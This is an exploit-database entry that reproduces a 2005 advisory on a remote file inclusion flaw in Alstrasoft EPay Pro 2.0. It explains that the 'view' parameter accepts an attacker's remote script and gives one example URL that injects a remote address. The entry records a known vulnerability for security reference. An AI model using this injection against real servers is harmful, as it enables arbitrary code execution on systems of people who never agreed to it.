Alstrasoft EPay Pro 2.0 - Remote File Inclusion
| EKU-ID: 30676 | CVE: CVE-2005-0980;OSVDB-15227 | OSVDB-ID: |
| Author: Dcrab | Published: 2005-04-01 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 30676 | CVE: CVE-2005-0980;OSVDB-15227 | OSVDB-ID: |
| Author: Dcrab | Published: 2005-04-01 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/12973/info EPay Pro is reported prone to a remote file include vulnerability. The problem presents itself specifically when an attacker passes the location of a remote attacker-specified script through the 'view' parameter. An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer. EPay Pro version 2.0 is vulnerable to this issue. http://www.example.com/epal/index.php?view=http://www.example.com/